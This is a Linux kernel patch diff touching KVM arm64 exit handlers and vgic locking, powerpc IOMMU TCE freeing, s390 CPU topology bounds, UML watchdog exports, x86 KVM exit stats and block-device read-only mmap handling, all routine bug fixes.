+@@ -351,17 +351,21 @@ static bool kvm_hyp_handle_cp15_32(struct kvm_vcpu *vcpu, u64 *exit_code)
+ 	return false;
+ }
+ 
+-static bool kvm_hyp_handle_iabt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
++static bool kvm_hyp_handle_memory_fault(struct kvm_vcpu *vcpu, u64 *exit_code)
+ {
+ 	if (!__populate_fault_info(vcpu))
+ 		return true;
+ 
+ 	return false;
+ }
++static bool kvm_hyp_handle_iabt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
++	__alias(kvm_hyp_handle_memory_fault);
++static bool kvm_hyp_handle_watchpt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
++	__alias(kvm_hyp_handle_memory_fault);
+ 
+ static bool kvm_hyp_handle_dabt_low(struct kvm_vcpu *vcpu, u64 *exit_code)
+ {
+-	if (!__populate_fault_info(vcpu))
++	if (kvm_hyp_handle_memory_fault(vcpu, exit_code))
+ 		return true;
+ 
+ 	if (static_branch_unlikely(&vgic_v2_cpuif_trap)) {
+diff --git a/arch/arm64/kvm/hyp/nvhe/switch.c b/arch/arm64/kvm/hyp/nvhe/switch.c
+index c2cb46ca4fb66..895fb32000762 100644
+--- a/arch/arm64/kvm/hyp/nvhe/switch.c
++++ b/arch/arm64/kvm/hyp/nvhe/switch.c
+@@ -186,6 +186,7 @@ static const exit_handler_fn hyp_exit_handlers[] = {
+ 	[ESR_ELx_EC_FP_ASIMD]		= kvm_hyp_handle_fpsimd,
+ 	[ESR_ELx_EC_IABT_LOW]		= kvm_hyp_handle_iabt_low,
+ 	[ESR_ELx_EC_DABT_LOW]		= kvm_hyp_handle_dabt_low,
++	[ESR_ELx_EC_WATCHPT_LOW]	= kvm_hyp_handle_watchpt_low,
+ 	[ESR_ELx_EC_PAC]		= kvm_hyp_handle_ptrauth,
+ };
+ 
+@@ -196,6 +197,7 @@ static const exit_handler_fn pvm_exit_handlers[] = {
+ 	[ESR_ELx_EC_FP_ASIMD]		= kvm_hyp_handle_fpsimd,
+ 	[ESR_ELx_EC_IABT_LOW]		= kvm_hyp_handle_iabt_low,
+ 	[ESR_ELx_EC_DABT_LOW]		= kvm_hyp_handle_dabt_low,
++	[ESR_ELx_EC_WATCHPT_LOW]	= kvm_hyp_handle_watchpt_low,
+ 	[ESR_ELx_EC_PAC]		= kvm_hyp_handle_ptrauth,
+ };
+ 
+diff --git a/arch/arm64/kvm/hyp/vhe/switch.c b/arch/arm64/kvm/hyp/vhe/switch.c
+index 1a97391fedd29..45ac4a59cc2ce 100644
+--- a/arch/arm64/kvm/hyp/vhe/switch.c
++++ b/arch/arm64/kvm/hyp/vhe/switch.c
+@@ -110,6 +110,7 @@ static const exit_handler_fn hyp_exit_handlers[] = {
+ 	[ESR_ELx_EC_FP_ASIMD]		= kvm_hyp_handle_fpsimd,
+ 	[ESR_ELx_EC_IABT_LOW]		= kvm_hyp_handle_iabt_low,
+ 	[ESR_ELx_EC_DABT_LOW]		= kvm_hyp_handle_dabt_low,
++	[ESR_ELx_EC_WATCHPT_LOW]	= kvm_hyp_handle_watchpt_low,
+ 	[ESR_ELx_EC_PAC]		= kvm_hyp_handle_ptrauth,
+ };
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index 8c1d2d7128db6..37e74ca4dad85 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -235,9 +235,9 @@ int kvm_vgic_vcpu_init(struct kvm_vcpu *vcpu)
+ 	 * KVM io device for the redistributor that belongs to this VCPU.
+ 	 */
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+-		mutex_lock(&vcpu->kvm->arch.config_lock);
++		mutex_lock(&vcpu->kvm->slots_lock);
+ 		ret = vgic_register_redist_iodev(vcpu);
+-		mutex_unlock(&vcpu->kvm->arch.config_lock);
++		mutex_unlock(&vcpu->kvm->slots_lock);
+ 	}
+ 	return ret;
+ }
+@@ -446,11 +446,13 @@ int vgic_lazy_init(struct kvm *kvm)
+ int kvm_vgic_map_resources(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
++	gpa_t dist_base;
+ 	int ret = 0;
+ 
+ 	if (likely(vgic_ready(kvm)))
+ 		return 0;
+ 
++	mutex_lock(&kvm->slots_lock);
+ 	mutex_lock(&kvm->arch.config_lock);
+ 	if (vgic_ready(kvm))
+ 		goto out;
+@@ -463,13 +465,26 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	else
+ 		ret = vgic_v3_map_resources(kvm);
+ 
+-	if (ret)
++	if (ret) {
+ 		__kvm_vgic_destroy(kvm);
+-	else
+-		dist->ready = true;
++		goto out;
++	}
++	dist->ready = true;
++	dist_base = dist->vgic_dist_base;
++	mutex_unlock(&kvm->arch.config_lock);
++
++	ret = vgic_register_dist_iodev(kvm, dist_base,
++				       kvm_vgic_global_state.type);
++	if (ret) {
++		kvm_err("Unable to register VGIC dist MMIO regions\n");
++		kvm_vgic_destroy(kvm);
++	}
++	mutex_unlock(&kvm->slots_lock);
++	return ret;
+ 
+ out:
+ 	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->slots_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index c9a03033d5077..00ad6587bee9a 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -1936,6 +1936,7 @@ void vgic_lpi_translation_cache_destroy(struct kvm *kvm)
+ 
+ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ {
++	int ret;
+ 	struct vgic_its *its;
+ 
+ 	if (type != KVM_DEV_TYPE_ARM_VGIC_ITS)
+@@ -1945,9 +1946,12 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 	if (!its)
+ 		return -ENOMEM;
+ 
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	if (vgic_initialized(dev->kvm)) {
+-		int ret = vgic_v4_init(dev->kvm);
++		ret = vgic_v4_init(dev->kvm);
+ 		if (ret < 0) {
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			kfree(its);
+ 			return ret;
+ 		}
+@@ -1960,12 +1964,10 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 
+ 	/* Yep, even more trickery for lock ordering... */
+ #ifdef CONFIG_LOCKDEP
+-	mutex_lock(&dev->kvm->arch.config_lock);
+ 	mutex_lock(&its->cmd_lock);
+ 	mutex_lock(&its->its_lock);
+ 	mutex_unlock(&its->its_lock);
+ 	mutex_unlock(&its->cmd_lock);
+-	mutex_unlock(&dev->kvm->arch.config_lock);
+ #endif
+ 
+ 	its->vgic_its_base = VGIC_ADDR_UNDEF;
+@@ -1986,7 +1988,11 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 
+ 	dev->private = its;
+ 
+-	return vgic_its_set_abi(its, NR_ITS_ABIS - 1);
++	ret = vgic_its_set_abi(its, NR_ITS_ABIS - 1);
++
++	mutex_unlock(&dev->kvm->arch.config_lock);
++
++	return ret;
+ }
+ 
+ static void vgic_its_destroy(struct kvm_device *kvm_dev)
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index 07e727023deb7..bf4b3d9631ce1 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -102,7 +102,11 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 		if (get_user(addr, uaddr))
+ 			return -EFAULT;
+ 
+-	mutex_lock(&kvm->arch.config_lock);
++	/*
++	 * Since we can't hold config_lock while registering the redistributor
++	 * iodevs, take the slots_lock immediately.
++	 */
++	mutex_lock(&kvm->slots_lock);
+ 	switch (attr->attr) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -182,6 +186,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	if (r)
+ 		goto out;
+ 
++	mutex_lock(&kvm->arch.config_lock);
+ 	if (write) {
+ 		r = vgic_check_iorange(kvm, *addr_ptr, addr, alignment, size);
+ 		if (!r)
+@@ -189,9 +194,10 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	} else {
+ 		addr = *addr_ptr;
+ 	}
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ out:
+-	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->slots_lock);
+ 
+ 	if (!r && !write)
+ 		r =  put_user(addr, uaddr);
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 472b18ac92a24..188d2187eede9 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -769,10 +769,13 @@ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu)
+ 	struct vgic_io_device *rd_dev = &vcpu->arch.vgic_cpu.rd_iodev;
+ 	struct vgic_redist_region *rdreg;
+ 	gpa_t rd_base;
+-	int ret;
++	int ret = 0;
++
++	lockdep_assert_held(&kvm->slots_lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	if (!IS_VGIC_ADDR_UNDEF(vgic_cpu->rd_iodev.base_addr))
+-		return 0;
++		goto out_unlock;
+ 
+ 	/*
+ 	 * We may be creating VCPUs before having set the base address for the
+@@ -782,10 +785,12 @@ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu)
+ 	 */
+ 	rdreg = vgic_v3_rdist_free_slot(&vgic->rd_regions);
+ 	if (!rdreg)
+-		return 0;
++		goto out_unlock;
+ 
+-	if (!vgic_v3_check_base(kvm))
+-		return -EINVAL;
++	if (!vgic_v3_check_base(kvm)) {
++		ret = -EINVAL;
++		goto out_unlock;
++	}
+ 
+ 	vgic_cpu->rdreg = rdreg;
+ 	vgic_cpu->rdreg_index = rdreg->free_index;
+@@ -799,16 +804,20 @@ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu)
+ 	rd_dev->nr_regions = ARRAY_SIZE(vgic_v3_rd_registers);
+ 	rd_dev->redist_vcpu = vcpu;
+ 
+-	mutex_lock(&kvm->slots_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++
+ 	ret = kvm_io_bus_register_dev(kvm, KVM_MMIO_BUS, rd_base,
+ 				      2 * SZ_64K, &rd_dev->dev);
+-	mutex_unlock(&kvm->slots_lock);
+-
+ 	if (ret)
+ 		return ret;
+ 
++	/* Protected by slots_lock */
+ 	rdreg->free_index++;
+ 	return 0;
++
++out_unlock:
++	mutex_unlock(&kvm->arch.config_lock);
++	return ret;
+ }
+ 
+ static void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu)
+@@ -834,12 +843,10 @@ static int vgic_register_all_redist_iodevs(struct kvm *kvm)
+ 		/* The current c failed, so iterate over the previous ones. */
+ 		int i;
+ 
+-		mutex_lock(&kvm->slots_lock);
+ 		for (i = 0; i < c; i++) {
+ 			vcpu = kvm_get_vcpu(kvm, i);
+ 			vgic_unregister_redist_iodev(vcpu);
+ 		}
+-		mutex_unlock(&kvm->slots_lock);
+ 	}
+ 
+ 	return ret;
+@@ -938,7 +945,9 @@ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count)
+ {
+ 	int ret;
+ 
++	mutex_lock(&kvm->arch.config_lock);
+ 	ret = vgic_v3_alloc_redist_region(kvm, index, addr, count);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -950,8 +959,10 @@ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count)
+ 	if (ret) {
+ 		struct vgic_redist_region *rdreg;
+ 
++		mutex_lock(&kvm->arch.config_lock);
+ 		rdreg = vgic_v3_rdist_region_from_index(kvm, index);
+ 		vgic_v3_free_redist_region(rdreg);
++		mutex_unlock(&kvm->arch.config_lock);
+ 		return ret;
+ 	}
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio.c b/arch/arm64/kvm/vgic/vgic-mmio.c
+index a95f99b93dd68..eb5c58d785b99 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio.c
+@@ -1093,7 +1093,6 @@ int vgic_register_dist_iodev(struct kvm *kvm, gpa_t dist_base_address,
+ 			     enum vgic_type type)
+ {
+ 	struct vgic_io_device *io_device = &kvm->arch.vgic.dist_iodev;
+-	int ret = 0;
+ 	unsigned int len;
+ 
+ 	switch (type) {
+@@ -1111,10 +1110,6 @@ int vgic_register_dist_iodev(struct kvm *kvm, gpa_t dist_base_address,
+ 	io_device->iodev_type = IODEV_DIST;
+ 	io_device->redist_vcpu = NULL;
+ 
+-	mutex_lock(&kvm->slots_lock);
+-	ret = kvm_io_bus_register_dev(kvm, KVM_MMIO_BUS, dist_base_address,
+-				      len, &io_device->dev);
+-	mutex_unlock(&kvm->slots_lock);
+-
+-	return ret;
++	return kvm_io_bus_register_dev(kvm, KVM_MMIO_BUS, dist_base_address,
++				       len, &io_device->dev);
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-v2.c b/arch/arm64/kvm/vgic/vgic-v2.c
+index 645648349c99b..7e9cdb78f7ce8 100644
+--- a/arch/arm64/kvm/vgic/vgic-v2.c
++++ b/arch/arm64/kvm/vgic/vgic-v2.c
+@@ -312,12 +312,6 @@ int vgic_v2_map_resources(struct kvm *kvm)
+ 		return ret;
+ 	}
+ 
+-	ret = vgic_register_dist_iodev(kvm, dist->vgic_dist_base, VGIC_V2);
+-	if (ret) {
+-		kvm_err("Unable to register VGIC MMIO regions\n");
+-		return ret;
+-	}
+-
+ 	if (!static_branch_unlikely(&vgic_v2_cpuif_trap)) {
+ 		ret = kvm_phys_addr_ioremap(kvm, dist->vgic_cpu_base,
+ 					    kvm_vgic_global_state.vcpu_base,
+diff --git a/arch/arm64/kvm/vgic/vgic-v3.c b/arch/arm64/kvm/vgic/vgic-v3.c
+index 5bdada3137287..f86c3007a319c 100644
+--- a/arch/arm64/kvm/vgic/vgic-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-v3.c
+@@ -538,7 +538,6 @@ int vgic_v3_map_resources(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	struct kvm_vcpu *vcpu;
+-	int ret = 0;
+ 	unsigned long c;
+ 
+ 	kvm_for_each_vcpu(c, vcpu, kvm) {
+@@ -568,12 +567,6 @@ int vgic_v3_map_resources(struct kvm *kvm)
+ 		return -EBUSY;
+ 	}
+ 
+-	ret = vgic_register_dist_iodev(kvm, dist->vgic_dist_base, VGIC_V3);
+-	if (ret) {
+-		kvm_err("Unable to register VGICv3 dist MMIO regions\n");
+-		return ret;
+-	}
+-
+ 	if (kvm_vgic_global_state.has_gicv4_1)
+ 		vgic_v4_configure_vsgis(kvm);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index 3bb0034780605..c1c28fe680ba3 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -184,13 +184,14 @@ static void vgic_v4_disable_vsgis(struct kvm_vcpu *vcpu)
+ 	}
+ }
+ 
+-/* Must be called with the kvm lock held */
+ void vgic_v4_configure_vsgis(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	kvm_arm_halt_guest(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm) {
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 4ee20280133e4..2fef1fa93e7b6 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -480,8 +480,8 @@ static void do_bad_area(unsigned long far, unsigned long esr,
+ 	}
+ }
+ 
+-#define VM_FAULT_BADMAP		0x010000
+-#define VM_FAULT_BADACCESS	0x020000
++#define VM_FAULT_BADMAP		((__force vm_fault_t)0x010000)
++#define VM_FAULT_BADACCESS	((__force vm_fault_t)0x020000)
+ 
+ static vm_fault_t __do_page_fault(struct mm_struct *mm, unsigned long addr,
+ 				  unsigned int mm_flags, unsigned long vm_flags,
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index efba867017e22..97b026130c71b 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -311,13 +311,22 @@ static void tce_free_pSeriesLP(unsigned long liobn, long tcenum, long tceshift,
+ static void tce_freemulti_pSeriesLP(struct iommu_table *tbl, long tcenum, long npages)
+ {
+ 	u64 rc;
++	long rpages = npages;
++	unsigned long limit;
+ 
+ 	if (!firmware_has_feature(FW_FEATURE_STUFF_TCE))
+ 		return tce_free_pSeriesLP(tbl->it_index, tcenum,
+ 					  tbl->it_page_shift, npages);
+ 
+-	rc = plpar_tce_stuff((u64)tbl->it_index,
+-			     (u64)tcenum << tbl->it_page_shift, 0, npages);
++	do {
++		limit = min_t(unsigned long, rpages, 512);
++
++		rc = plpar_tce_stuff((u64)tbl->it_index,
++				     (u64)tcenum << tbl->it_page_shift, 0, limit);
++
++		rpages -= limit;
++		tcenum += limit;
++	} while (rpages > 0 && !rc);
+ 
+ 	if (rc && printk_ratelimit()) {
+ 		printk("tce_freemulti_pSeriesLP: plpar_tce_stuff failed\n");
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index e34d7809f6c9f..bd8e80936f44d 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -91,7 +91,7 @@ static unsigned long ndump = 64;
+ static unsigned long nidump = 16;
+ static unsigned long ncsum = 4096;
+ static int termch;
+-static char tmpstr[128];
++static char tmpstr[KSYM_NAME_LEN];
+ static int tracing_enabled;
+ 
+ static long bus_error_jmp[JMP_BUF_LEN];
+diff --git a/arch/riscv/include/asm/perf_event.h b/arch/riscv/include/asm/perf_event.h
+index d42c901f9a977..665bbc9b2f840 100644
+--- a/arch/riscv/include/asm/perf_event.h
++++ b/arch/riscv/include/asm/perf_event.h
+@@ -10,4 +10,11 @@
+ 
+ #include <linux/perf_event.h>
+ #define perf_arch_bpf_user_pt_regs(regs) (struct user_regs_struct *)regs
++
++#define perf_arch_fetch_caller_regs(regs, __ip) { \
++	(regs)->epc = (__ip); \
++	(regs)->s0 = (unsigned long) __builtin_frame_address(0); \
++	(regs)->sp = current_stack_pointer; \
++	(regs)->status = SR_PP; \
++}
+ #endif /* _ASM_RISCV_PERF_EVENT_H */
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 6315a3c942259..2b9906ed2d1d1 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -845,9 +845,9 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+ static void __init create_fdt_early_page_table(uintptr_t fix_fdt_va,
+ 					       uintptr_t dtb_pa)
+ {
++#ifndef CONFIG_BUILTIN_DTB
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+ 
+-#ifndef CONFIG_BUILTIN_DTB
+ 	/* Make sure the fdt fixmap address is always aligned on PMD size */
+ 	BUILD_BUG_ON(FIX_FDT % (PMD_SIZE / PAGE_SIZE));
+ 
+diff --git a/arch/s390/kernel/topology.c b/arch/s390/kernel/topology.c
+index c6eecd4a5302d..10b20aeb27d3b 100644
+--- a/arch/s390/kernel/topology.c
++++ b/arch/s390/kernel/topology.c
+@@ -95,7 +95,7 @@ out:
+ static void cpu_thread_map(cpumask_t *dst, unsigned int cpu)
+ {
+ 	static cpumask_t mask;
+-	int i;
++	unsigned int max_cpu;
+ 
+ 	cpumask_clear(&mask);
+ 	if (!cpumask_test_cpu(cpu, &cpu_setup_mask))
+@@ -104,9 +104,10 @@ static void cpu_thread_map(cpumask_t *dst, unsigned int cpu)
+ 	if (topology_mode != TOPOLOGY_MODE_HW)
+ 		goto out;
+ 	cpu -= cpu % (smp_cpu_mtid + 1);
+-	for (i = 0; i <= smp_cpu_mtid; i++) {
+-		if (cpumask_test_cpu(cpu + i, &cpu_setup_mask))
+-			cpumask_set_cpu(cpu + i, &mask);
++	max_cpu = min(cpu + smp_cpu_mtid, nr_cpu_ids - 1);
++	for (; cpu <= max_cpu; cpu++) {
++		if (cpumask_test_cpu(cpu, &cpu_setup_mask))
++			cpumask_set_cpu(cpu, &mask);
+ 	}
+ out:
+ 	cpumask_copy(dst, &mask);
+@@ -123,25 +124,26 @@ static void add_cpus_to_mask(struct topology_core *tl_core,
+ 	unsigned int core;
+ 
+ 	for_each_set_bit(core, &tl_core->mask, TOPOLOGY_CORE_BITS) {
+-		unsigned int rcore;
+-		int lcpu, i;
++		unsigned int max_cpu, rcore;
++		int cpu;
+ 
+ 		rcore = TOPOLOGY_CORE_BITS - 1 - core + tl_core->origin;
+-		lcpu = smp_find_processor_id(rcore << smp_cpu_mt_shift);
+-		if (lcpu < 0)
++		cpu = smp_find_processor_id(rcore << smp_cpu_mt_shift);
++		if (cpu < 0)
+ 			continue;
+-		for (i = 0; i <= smp_cpu_mtid; i++) {
+-			topo = &cpu_topology[lcpu + i];
++		max_cpu = min(cpu + smp_cpu_mtid, nr_cpu_ids - 1);
++		for (; cpu <= max_cpu; cpu++) {
++			topo = &cpu_topology[cpu];
+ 			topo->drawer_id = drawer->id;
+ 			topo->book_id = book->id;
+ 			topo->socket_id = socket->id;
+ 			topo->core_id = rcore;
+-			topo->thread_id = lcpu + i;
++			topo->thread_id = cpu;
+ 			topo->dedicated = tl_core->d;
+-			cpumask_set_cpu(lcpu + i, &drawer->mask);
+-			cpumask_set_cpu(lcpu + i, &book->mask);
+-			cpumask_set_cpu(lcpu + i, &socket->mask);
+-			smp_cpu_set_polarization(lcpu + i, tl_core->pp);
++			cpumask_set_cpu(cpu, &drawer->mask);
++			cpumask_set_cpu(cpu, &book->mask);
++			cpumask_set_cpu(cpu, &socket->mask);
++			smp_cpu_set_polarization(cpu, tl_core->pp);
+ 		}
+ 	}
+ }
+diff --git a/arch/um/drivers/Makefile b/arch/um/drivers/Makefile
+index e1dc4292bd22e..65b449c992d2c 100644
+--- a/arch/um/drivers/Makefile
++++ b/arch/um/drivers/Makefile
+@@ -16,7 +16,8 @@ mconsole-objs := mconsole_kern.o mconsole_user.o
+ hostaudio-objs := hostaudio_kern.o
+ ubd-objs := ubd_kern.o ubd_user.o
+ port-objs := port_kern.o port_user.o
+-harddog-objs := harddog_kern.o harddog_user.o
++harddog-objs := harddog_kern.o
++harddog-builtin-$(CONFIG_UML_WATCHDOG) := harddog_user.o harddog_user_exp.o
+ rtc-objs := rtc_kern.o rtc_user.o
+ 
+ LDFLAGS_pcap.o = $(shell $(CC) $(KBUILD_CFLAGS) -print-file-name=libpcap.a)
+@@ -60,6 +61,7 @@ obj-$(CONFIG_PTY_CHAN) += pty.o
+ obj-$(CONFIG_TTY_CHAN) += tty.o 
+ obj-$(CONFIG_XTERM_CHAN) += xterm.o xterm_kern.o
+ obj-$(CONFIG_UML_WATCHDOG) += harddog.o
++obj-y += $(harddog-builtin-y) $(harddog-builtin-m)
+ obj-$(CONFIG_BLK_DEV_COW_COMMON) += cow_user.o
+ obj-$(CONFIG_UML_RANDOM) += random.o
+ obj-$(CONFIG_VIRTIO_UML) += virtio_uml.o
+diff --git a/arch/um/drivers/harddog.h b/arch/um/drivers/harddog.h
+new file mode 100644
+index 0000000000000..6d9ea60e7133e
+--- /dev/null
++++ b/arch/um/drivers/harddog.h
+@@ -0,0 +1,9 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef UM_WATCHDOG_H
++#define UM_WATCHDOG_H
++
++int start_watchdog(int *in_fd_ret, int *out_fd_ret, char *sock);
++void stop_watchdog(int in_fd, int out_fd);
++int ping_watchdog(int fd);
++
++#endif /* UM_WATCHDOG_H */
+diff --git a/arch/um/drivers/harddog_kern.c b/arch/um/drivers/harddog_kern.c
+index e6d4f43deba82..60d1c6cab8a95 100644
+--- a/arch/um/drivers/harddog_kern.c
++++ b/arch/um/drivers/harddog_kern.c
+@@ -47,6 +47,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/uaccess.h>
+ #include "mconsole.h"
++#include "harddog.h"
+ 
+ MODULE_LICENSE("GPL");
+ 
+@@ -60,8 +61,6 @@ static int harddog_out_fd = -1;
+  *	Allow only one person to hold it open
+  */
+ 
+-extern int start_watchdog(int *in_fd_ret, int *out_fd_ret, char *sock);
+-
+ static int harddog_open(struct inode *inode, struct file *file)
+ {
+ 	int err = -EBUSY;
+@@ -92,8 +91,6 @@ err:
+ 	return err;
+ }
+ 
+-extern void stop_watchdog(int in_fd, int out_fd);
+-
+ static int harddog_release(struct inode *inode, struct file *file)
+ {
+ 	/*
+@@ -112,8 +109,6 @@ static int harddog_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-extern int ping_watchdog(int fd);
+-
+ static ssize_t harddog_write(struct file *file, const char __user *data, size_t len,
+ 			     loff_t *ppos)
+ {
+diff --git a/arch/um/drivers/harddog_user.c b/arch/um/drivers/harddog_user.c
+index 070468d22e394..9ed89304975ed 100644
+--- a/arch/um/drivers/harddog_user.c
++++ b/arch/um/drivers/harddog_user.c
+@@ -7,6 +7,7 @@
+ #include <unistd.h>
+ #include <errno.h>
+ #include <os.h>
++#include "harddog.h"
+ 
+ struct dog_data {
+ 	int stdin_fd;
+diff --git a/arch/um/drivers/harddog_user_exp.c b/arch/um/drivers/harddog_user_exp.c
+new file mode 100644
+index 0000000000000..c74d4b815d143
+--- /dev/null
++++ b/arch/um/drivers/harddog_user_exp.c
+@@ -0,0 +1,9 @@
++// SPDX-License-Identifier: GPL-2.0
++#include <linux/export.h>
++#include "harddog.h"
++
++#if IS_MODULE(CONFIG_UML_WATCHDOG)
++EXPORT_SYMBOL(start_watchdog);
++EXPORT_SYMBOL(stop_watchdog);
++EXPORT_SYMBOL(ping_watchdog);
++#endif
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index d7af225b63d89..f48ab047b41d4 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -10829,6 +10829,9 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
+ 			exit_fastpath = EXIT_FASTPATH_EXIT_HANDLED;
+ 			break;
+ 		}
++
++		/* Note, VM-Exits that go down the "slow" path are accounted below. */
++		++vcpu->stat.exits;
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/mm/pat/memtype.c b/arch/x86/mm/pat/memtype.c
+index 2642bc4c8ec07..66a209f7eb86d 100644
+--- a/arch/x86/mm/pat/memtype.c
++++ b/arch/x86/mm/pat/memtype.c
+@@ -434,8 +434,7 @@ static unsigned long pat_x_mtrr_type(u64 start, u64 end,
+ 		u8 mtrr_type, uniform;
+ 
+ 		mtrr_type = mtrr_type_lookup(start, end, &uniform);
+-		if (mtrr_type != MTRR_TYPE_WRBACK &&
+-		    mtrr_type != MTRR_TYPE_INVALID)
++		if (mtrr_type != MTRR_TYPE_WRBACK)
+ 			return _PAGE_CACHE_MODE_UC_MINUS;
+ 
+ 		return _PAGE_CACHE_MODE_WB;
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index 8ac1038d0c797..291cf9df7fc29 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -909,6 +909,7 @@ static bool disk_has_partitions(struct gendisk *disk)
+ void disk_set_zoned(struct gendisk *disk, enum blk_zoned_model model)
+ {
+ 	struct request_queue *q = disk->queue;
++	unsigned int old_model = q->limits.zoned;
+ 
+ 	switch (model) {
+ 	case BLK_ZONED_HM:
+@@ -946,7 +947,7 @@ void disk_set_zoned(struct gendisk *disk, enum blk_zoned_model model)
+ 		 */
+ 		blk_queue_zone_write_granularity(q,
+ 						queue_logical_block_size(q));
+-	} else {
++	} else if (old_model != BLK_ZONED_NONE) {
+ 		disk_clear_zone_settings(disk);
+ 	}
+ }
+diff --git a/block/fops.c b/block/fops.c
+index e406aa605327e..6197d1c41652d 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -685,6 +685,16 @@ static long blkdev_fallocate(struct file *file, int mode, loff_t start,
+ 	return error;
+ }
+ 
++static int blkdev_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct inode *bd_inode = bdev_file_inode(file);
++
++	if (bdev_read_only(I_BDEV(bd_inode)))
++		return generic_file_readonly_mmap(file, vma);
++
++	return generic_file_mmap(file, vma);
++}
++
+ const struct file_operations def_blk_fops = {
+ 	.open		= blkdev_open,
+ 	.release	= blkdev_close,
+@@ -692,7 +702,7 @@ const struct file_operations def_blk_fops = {
+ 	.read_iter	= blkdev_read_iter,
+ 	.write_iter	= blkdev_write_iter,
+ 	.iopoll		= iocb_bio_iopoll,
+-	.mmap		= generic_file_mmap,
++	.mmap		= blkdev_mmap,
+ 	.fsync		= blkdev_fsync,
+ 	.unlocked_ioctl	= blkdev_ioctl,
+ #ifdef CONFIG_COMPAT
